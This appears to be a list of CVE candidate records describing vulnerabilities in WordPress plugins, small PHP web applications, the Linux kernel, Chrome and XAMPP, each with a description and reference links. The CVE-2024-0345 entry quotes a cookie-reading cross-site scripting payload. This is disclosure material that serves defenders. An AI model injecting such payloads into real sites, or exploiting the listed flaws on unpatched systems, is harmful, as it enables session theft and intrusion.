CVE 2024 374 Candidate The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'create_view' function. This makes it possible for unauthenticated attackers to create views via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve Assigned (20240109)
CVE 2024 373 Candidate The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'save_view' function. This makes it possible for unauthenticated attackers to modify arbitrary post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve Assigned (20240109)
CVE 2024 372 Candidate The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_form_fields' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views. MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve Assigned (20240109)
CVE 2024 371 Candidate The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'create_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views. MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve Assigned (20240109)
CVE 2024 370 Candidate The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts. MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve Assigned (20240109)
CVE 2024 369 Candidate The Bulk Edit Post Titles plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulkUpdatePostTitles function in all versions up to, and including, 5.0.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts. MISC:https://plugins.trac.wordpress.org/browser/bulk-edit-post-titles/trunk/classes/class.bulk.titles.php#L130 | URL:https://plugins.trac.wordpress.org/browser/bulk-edit-post-titles/trunk/classes/class.bulk.titles.php#L130 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cad19306-6eef-4f80-9442-e7b314b3a873?source=cve Assigned (20240109)
CVE 2024 368 Candidate The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.8.3 via hardcoded API Keys. This makes it possible for unauthenticated attackers to extract sensitive data including PII. MISC:https://developers.hubspot.com/docs/api/webhooks#manage-settings-via-api | URL:https://developers.hubspot.com/docs/api/webhooks#manage-settings-via-api | MISC:https://developers.hubspot.com/docs/api/webhooks#scopes | URL:https://developers.hubspot.com/docs/api/webhooks#scopes | MISC:https://plugins.trac.wordpress.org/browser/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php#L13 | URL:https://plugins.trac.wordpress.org/browser/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php#L13 | MISC:https://plugins.trac.wordpress.org/changeset/3047775/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup/tags/7.8.3/inc/providers/hubspot/hustle-hubspot-api.php | URL:https://plugins.trac.wordpress.org/changeset/3047775/wordpress-popup/trunk/inc/providers/hubspot/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup/tags/7.8.3/inc/providers/hubspot/hustle-hubspot-api.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e6d40b41-540d-476d-afde-970845543933?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e6d40b41-540d-476d-afde-970845543933?source=cve Assigned (20240109)
CVE 2024 366 Candidate The Starbox – the Author Box for Humans plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.4.7 via the action function due to missing validation on a user controlled key. This makes it possible for subscribers to view plugin preferences and potentially other user settings. MISC:https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php | URL:https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php | MISC:https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk | URL:https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve Assigned (20240109)
CVE 2024 365 Candidate The Fancy Product Designer WordPress plugin before 6.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators. MISC:https://wpscan.com/vulnerability/4b8b9638-d52a-40bc-b298-ae1c74788c18/ | URL:https://wpscan.com/vulnerability/4b8b9638-d52a-40bc-b298-ae1c74788c18/ Assigned (20240109)
CVE 2024 364 Candidate A vulnerability, which was classified as critical, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file admin/query-details.php. The manipulation of the argument adminremark leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250131. MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL11.docx | URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL11.docx | MISC:https://vuldb.com/?ctiid.250131 | URL:https://vuldb.com/?ctiid.250131 | MISC:https://vuldb.com/?id.250131 | URL:https://vuldb.com/?id.250131 Assigned (20240109)
CVE 2024 363 Candidate A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the file admin/patient-search.php. The manipulation of the argument searchdata leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250130 is the identifier assigned to this vulnerability. MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL10.docx | URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL10.docx | MISC:https://vuldb.com/?ctiid.250130 | URL:https://vuldb.com/?ctiid.250130 | MISC:https://vuldb.com/?id.250130 | URL:https://vuldb.com/?id.250130 Assigned (20240109)
CVE 2024 362 Candidate A vulnerability classified as critical was found in PHPGurukul Hospital Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/change-password.php. The manipulation of the argument cpass leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250129 was assigned to this vulnerability. MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL8.docx | URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL8.docx | MISC:https://vuldb.com/?ctiid.250129 | URL:https://vuldb.com/?ctiid.250129 | MISC:https://vuldb.com/?id.250129 | URL:https://vuldb.com/?id.250129 Assigned (20240109)
CVE 2024 361 Candidate A vulnerability classified as critical has been found in PHPGurukul Hospital Management System 1.0. Affected is an unknown function of the file admin/contact.php. The manipulation of the argument mobnum leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250128. MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL7.docx | URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL7.docx | MISC:https://vuldb.com/?ctiid.250128 | URL:https://vuldb.com/?ctiid.250128 | MISC:https://vuldb.com/?id.250128 | URL:https://vuldb.com/?id.250128 Assigned (20240109)
CVE 2024 360 Candidate A vulnerability was found in PHPGurukul Hospital Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/edit-doctor-specialization.php. The manipulation of the argument doctorspecilization leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250127. MISC:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL4.docx | URL:https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL4.docx | MISC:https://vuldb.com/?ctiid.250127 | URL:https://vuldb.com/?ctiid.250127 | MISC:https://vuldb.com/?id.250127 | URL:https://vuldb.com/?id.250127 Assigned (20240109)
CVE 2024 359 Candidate A vulnerability was found in code-projects Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250126 is the identifier assigned to this vulnerability. MISC:https://github.com/ZJQcicadawings/VulSql/blob/main/Simple%20Online%20Hotel%20Reservation%20System%20login.php%20has%20Sqlinjection.pdf | URL:https://github.com/ZJQcicadawings/VulSql/blob/main/Simple%20Online%20Hotel%20Reservation%20System%20login.php%20has%20Sqlinjection.pdf | MISC:https://vuldb.com/?ctiid.250126 | URL:https://vuldb.com/?ctiid.250126 | MISC:https://vuldb.com/?id.250126 | URL:https://vuldb.com/?id.250126 Assigned (20240109)
CVE 2024 358 Candidate A vulnerability was found in DeShang DSO2O up to 4.1.0. It has been classified as critical. This affects an unknown part of the file /install/install.php. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250125 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/Po2N8SpTuzrV | URL:https://note.zhaoj.in/share/Po2N8SpTuzrV | MISC:https://vuldb.com/?ctiid.250125 | URL:https://vuldb.com/?ctiid.250125 | MISC:https://vuldb.com/?id.250125 | URL:https://vuldb.com/?id.250125 Assigned (20240109)
CVE 2024 357 Candidate A vulnerability was found in coderd-repos Eva 1.0.0 and classified as critical. Affected by this issue is some unknown functionality of the file /system/traceLog/page of the component HTTP POST Request Handler. The manipulation of the argument property leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250124. MISC:https://github.com/laoquanshi/heishou/blob/main/eva%20sql.md | URL:https://github.com/laoquanshi/heishou/blob/main/eva%20sql.md | MISC:https://vuldb.com/?ctiid.250124 | URL:https://vuldb.com/?ctiid.250124 | MISC:https://vuldb.com/?id.250124 | URL:https://vuldb.com/?id.250124 Assigned (20240109)
CVE 2024 356 Candidate A vulnerability has been found in Mandelo ssm_shiro_blog 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file updateRoles of the component Backend. The manipulation leads to improper access controls. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250123. MISC:https://medium.com/@heishou/ssm-has-a-vertical-override-vulnerability-8728da71842e | URL:https://medium.com/@heishou/ssm-has-a-vertical-override-vulnerability-8728da71842e | MISC:https://vuldb.com/?ctiid.250123 | URL:https://vuldb.com/?ctiid.250123 | MISC:https://vuldb.com/?id.250123 | URL:https://vuldb.com/?id.250123 Assigned (20240109)
CVE 2024 355 Candidate A vulnerability, which was classified as critical, was found in PHPGurukul Dairy Farm Shop Management System up to 1.1. Affected is an unknown function of the file add-category.php. The manipulation of the argument category leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250122 is the identifier assigned to this vulnerability. MISC:https://medium.com/@heishou/dfsms-has-sql-injection-vulnerability-e9cfbc375be8 | URL:https://medium.com/@heishou/dfsms-has-sql-injection-vulnerability-e9cfbc375be8 | MISC:https://vuldb.com/?ctiid.250122 | URL:https://vuldb.com/?ctiid.250122 | MISC:https://vuldb.com/?id.250122 | URL:https://vuldb.com/?id.250122 Assigned (20240109)
CVE 2024 354 Candidate A vulnerability, which was classified as critical, has been found in unknown-o download-station up to 1.1.8. This issue affects some unknown processing of the file index.php. The manipulation of the argument f leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250121 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/nHD5xiHQgHG0 | URL:https://note.zhaoj.in/share/nHD5xiHQgHG0 | MISC:https://vuldb.com/?ctiid.250121 | URL:https://vuldb.com/?ctiid.250121 | MISC:https://vuldb.com/?id.250121 | URL:https://vuldb.com/?id.250121 Assigned (20240109)
CVE 2024 353 Candidate Local privilege escalation vulnerability potentially allowed an attacker to misuse ESET’s file operations to delete files without having proper permission. MISC:https://support.eset.com/en/ca8612-eset-customer-advisory-link-following-local-privilege-escalation-vulnerability-in-eset-products-for-windows-fixed | URL:https://support.eset.com/en/ca8612-eset-customer-advisory-link-following-local-privilege-escalation-vulnerability-in-eset-products-for-windows-fixed Assigned (20240109)
CVE 2024 352 Candidate A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250120. MISC:https://note.zhaoj.in/share/ciwYj7QXC4sZ | URL:https://note.zhaoj.in/share/ciwYj7QXC4sZ | MISC:https://vuldb.com/?ctiid.250120 | URL:https://vuldb.com/?ctiid.250120 | MISC:https://vuldb.com/?id.250120 | URL:https://vuldb.com/?id.250120 Assigned (20240109)
CVE 2024 351 Candidate A vulnerability classified as problematic has been found in SourceCodester Engineers Online Portal 1.0. This affects an unknown part. The manipulation leads to session fixiation. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250119. MISC:https://mega.nz/file/LJlBQLhR#Ix4yNMdtVtlJFQP6Ae6fbXmnyH4bXTTAWN_JT5kzXzg | URL:https://mega.nz/file/LJlBQLhR#Ix4yNMdtVtlJFQP6Ae6fbXmnyH4bXTTAWN_JT5kzXzg | MISC:https://vuldb.com/?ctiid.250119 | URL:https://vuldb.com/?ctiid.250119 | MISC:https://vuldb.com/?id.250119 | URL:https://vuldb.com/?id.250119 Assigned (20240109)
CVE 2024 350 Candidate A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-250118 is the identifier assigned to this vulnerability. MISC:https://mega.nz/file/fckFBASJ#lffaC0xY44ri9Ln-7hrUbUtq2GTiE8roiW8guR7QeVE | URL:https://mega.nz/file/fckFBASJ#lffaC0xY44ri9Ln-7hrUbUtq2GTiE8roiW8guR7QeVE | MISC:https://vuldb.com/?ctiid.250118 | URL:https://vuldb.com/?ctiid.250118 | MISC:https://vuldb.com/?id.250118 | URL:https://vuldb.com/?id.250118 Assigned (20240109)
CVE 2024 349 Candidate A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to sensitive cookie without secure attribute. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-250117 was assigned to this vulnerability. MISC:https://mega.nz/file/TU1X3TIQ#7bPvxEP0KrdoDZVg-dqinNC5fEQrG5uu58jWzPGh904 | URL:https://mega.nz/file/TU1X3TIQ#7bPvxEP0KrdoDZVg-dqinNC5fEQrG5uu58jWzPGh904 | MISC:https://vuldb.com/?ctiid.250117 | URL:https://vuldb.com/?ctiid.250117 | MISC:https://vuldb.com/?id.250117 | URL:https://vuldb.com/?id.250117 Assigned (20240109)
CVE 2024 348 Candidate A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the component File Upload Handler. The manipulation leads to resource consumption. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250116. MISC:https://mega.nz/file/HNkn2QbI#EjefwKgFoAjtWcxrQFMgBfhVQ1LAf2hq7Jg-nDsE-P4 | URL:https://mega.nz/file/HNkn2QbI#EjefwKgFoAjtWcxrQFMgBfhVQ1LAf2hq7Jg-nDsE-P4 | MISC:https://vuldb.com/?ctiid.250116 | URL:https://vuldb.com/?ctiid.250116 | MISC:https://vuldb.com/?id.250116 | URL:https://vuldb.com/?id.250116 Assigned (20240109)
CVE 2024 347 Candidate A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file signup_teacher.php. The manipulation of the argument Password leads to weak password requirements. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250115. MISC:https://mega.nz/file/2d8GiY4Z#QSKItMUgIsW1-A-QPs9dgUSd2SCZfDg4aHORttFpUF0 | URL:https://mega.nz/file/2d8GiY4Z#QSKItMUgIsW1-A-QPs9dgUSd2SCZfDg4aHORttFpUF0 | MISC:https://vuldb.com/?ctiid.250115 | URL:https://vuldb.com/?ctiid.250115 | MISC:https://vuldb.com/?id.250115 | URL:https://vuldb.com/?id.250115 Assigned (20240109)
CVE 2024 346 Candidate A vulnerability has been found in CodeAstro Vehicle Booking System 1.0 and classified as problematic. This vulnerability affects unknown code of the file usr/user-give-feedback.php of the component Feedback Page. The manipulation of the argument My Testemonial leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250114 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1bao4YK4GwvAvCdCrsW5UpJZdvREdc_Yj/view?usp=sharing | URL:https://drive.google.com/file/d/1bao4YK4GwvAvCdCrsW5UpJZdvREdc_Yj/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250114 | URL:https://vuldb.com/?ctiid.250114 | MISC:https://vuldb.com/?id.250114 | URL:https://vuldb.com/?id.250114 Assigned (20240109)
CVE 2024 345 Candidate A vulnerability, which was classified as problematic, was found in CodeAstro Vehicle Booking System 1.0. This affects an unknown part of the file usr/usr-register.php of the component User Registration. The manipulation of the argument Full_Name/Last_Name/Address with the input <script>alert(document.cookie)</script> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250113 was assigned to this vulnerability. MISC:https://drive.google.com/file/d/1ihxLw4kzbAbDhHtca3UnTaB-iMWHi5DJ/view?usp=sharing | URL:https://drive.google.com/file/d/1ihxLw4kzbAbDhHtca3UnTaB-iMWHi5DJ/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250113 | URL:https://vuldb.com/?ctiid.250113 | MISC:https://vuldb.com/?id.250113 | URL:https://vuldb.com/?id.250113 Assigned (20240109)
CVE 2024 344 Candidate A vulnerability, which was classified as critical, has been found in soxft TimeMail up to 1.1. Affected by this issue is some unknown functionality of the file check.php. The manipulation of the argument c leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250112. MISC:https://note.zhaoj.in/share/VSutvlpgCJkD | URL:https://note.zhaoj.in/share/VSutvlpgCJkD | MISC:https://vuldb.com/?ctiid.250112 | URL:https://vuldb.com/?ctiid.250112 | MISC:https://vuldb.com/?id.250112 | URL:https://vuldb.com/?id.250112 Assigned (20240109)
CVE 2024 343 Candidate A vulnerability classified as problematic was found in CodeAstro Simple House Rental System 5.6. Affected by this vulnerability is an unknown functionality of the component Login Panel. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250111. MISC:https://drive.google.com/file/d/1NHdebIGiV8FybYFGXIqWHjdVGzZCQqAm/view?usp=sharing | URL:https://drive.google.com/file/d/1NHdebIGiV8FybYFGXIqWHjdVGzZCQqAm/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250111 | URL:https://vuldb.com/?ctiid.250111 | MISC:https://vuldb.com/?id.250111 | URL:https://vuldb.com/?id.250111 Assigned (20240109)
CVE 2024 342 Candidate A vulnerability classified as critical has been found in Inis up to 2.0.1. Affected is an unknown function of the file /app/api/controller/default/Sqlite.php. The manipulation of the argument sql leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250110 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/nWYJHrmUqv7i | URL:https://note.zhaoj.in/share/nWYJHrmUqv7i | MISC:https://vuldb.com/?ctiid.250110 | URL:https://vuldb.com/?ctiid.250110 | MISC:https://vuldb.com/?id.250110 | URL:https://vuldb.com/?id.250110 Assigned (20240109)
CVE 2024 341 Candidate A vulnerability was found in Inis up to 2.0.1. It has been rated as problematic. This issue affects some unknown processing of the file /app/api/controller/default/File.php of the component GET Request Handler. The manipulation of the argument path leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. The identifier VDB-250109 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/VYx8H9u8gyHw | URL:https://note.zhaoj.in/share/VYx8H9u8gyHw | MISC:https://vuldb.com/?ctiid.250109 | URL:https://vuldb.com/?ctiid.250109 | MISC:https://vuldb.com/?id.250109 | URL:https://vuldb.com/?id.250109 Assigned (20240109)
CVE 2024 340 Candidate A vulnerability was found in vhost_new_msg in drivers/vhost/vhost.c in the Linux kernel, which does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This issue can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file. MISC:RHBZ#2257406 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2257406 | MISC:https://access.redhat.com/security/cve/CVE-2024-0340 | URL:https://access.redhat.com/security/cve/CVE-2024-0340 | MISC:https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/ | URL:https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/ Assigned (20240109)
CVE 2024 338 Candidate A buffer overflow vulnerability has been found in XAMPP affecting version 8.2.4 and earlier. An attacker could execute arbitrary code through a long file debug argument that controls the Structured Exception Handler (SEH). MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp Assigned (20240109)
CVE 2024 337 Candidate The Travelpayouts: All Travel Brands in One Place WordPress plugin through 1.1.15 is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. MISC:https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/ | URL:https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/ Assigned (20240109)
CVE 2024 333 Candidate Insufficient data validation in Extensions in Google Chrome prior to 120.0.6099.216 allowed an attacker in a privileged network position to install a malicious extension via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-01607ac0ae | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPYCYENYQYADCOS6XG4JITUVRZ6HTE2B/ | FEDORA:FEDORA-2024-237107cece | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4BXC7FJIAZRY3P72XC4Z4UOW2QDA7YX7/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_9.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_9.html | MISC:https://crbug.com/1513379 | URL:https://crbug.com/1513379 Assigned (20240108)
CVE 2024 326 Candidate The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Link Wrapper functionality in all versions up to, and including, 4.10.17 due to insufficient input sanitization and output escaping on user supplied links. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/includes/class-premium-template-tags.php#L1638 | URL:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/includes/class-premium-template-tags.php#L1638 | MISC:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php#L173 | URL:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php#L173 | MISC:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/widgets/premium-button.php#L1709 | URL:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/widgets/premium-button.php#L1709 | MISC:https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php | URL:https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve Assigned (20240108)
CVE 2024 325 Candidate In Helix Sync versions prior to 2024.1, a local command injection was identified. Reported by Bryan Riggins. MISC:https://perforce.com | URL:https://perforce.com Assigned (20240108)
